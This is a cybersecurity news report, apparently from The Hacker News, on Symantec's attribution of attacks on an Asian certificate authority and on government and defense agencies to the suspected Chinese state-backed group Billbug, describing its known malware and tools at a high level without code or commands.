A suspected Chinese state-sponsored actor breached a digital
certificate authority as well as government and defense agencies
located in different countries in Asia as part of an ongoing
campaign since at least March 2022.
Symantec, by Broadcom Software, linked the attacks to an
adversarial group it tracks under the name
Billbug, citing the use of tools previously
attributed to this actor. The activity appears to be driven by
espionage and data-theft, although no data is said to have been
stolen to date.
Billbug[1], also called Bronze
Elgin, Lotus Blossom, Lotus Panda, Spring Dragon[2], and Thrip[3], is an advanced
persistent threat (APT) group that is believed to operate on behalf
of Chinese interests. Primary targets include government and
military organizations in South East Asia.
Attacks mounted by the adversary in 2019 involved the use of
backdoors like Hannotog and Sagerunex[4], with the intrusions
observed in Hong Kong, Macau, Indonesia, Malaysia, the Philippines,
and Vietnam.
Both the implants are designed to grant persistent remote access
to the victim network, even as the threat actor is known to deploy
an information-stealer known as Catchamas in select cases to
exfiltrate sensitive information.
“The targeting of a certificate authority is notable, as if the
attackers were able to successfully compromise it to access
certificates they could potentially use them to sign malware with a
valid certificate, and help it avoid detection on victim machines,”
Symantec researchers said[5]
in a report shared with The Hacker News.
“It could also potentially use compromised certificates to
intercept HTTPS traffic.”
The cybersecurity company, however, noted that there is no
evidence to indicate that Billbug was successful in compromising
the digital certificates. The concerned authority, it said, was
notified of the activity.
An analysis of the latest wave of attacks indicates that initial
access is likely obtained through the exploitation of
internet-facing applications, following which a combination of
bespoke and living-off-the-land tools are employed to meet its
operational goals.
This comprises utilities such as WinRAR, Ping, Traceroute,
NBTscan, Certutil, in addition to a backdoor capable of downloading
arbitrary files, gathering system information, and uploading
encrypted data.
Also detected in the attacks were an open source multi-hop proxy
tool called Stowaway[6]
and the Sagerunex malware, which is dropped on the machine via
Hannotog. The backdoor, for its part, is equipped to run arbitrary
commands, drop additional payloads, and siphon files of
interest.
“The ability of this actor to compromise multiple victims at
once indicates that this threat group remains a skilled and
well-resourced operator that is capable of carrying out sustained
and wide-ranging campaigns,” the researchers concluded.
“Billbug also appears to be undeterred by the possibility of
having this activity attributed to it, with it reusing tools that
have been linked to the group in the past.”
References
Read more https://thehackernews.com/2022/11/researchers-say-china-state-backed.html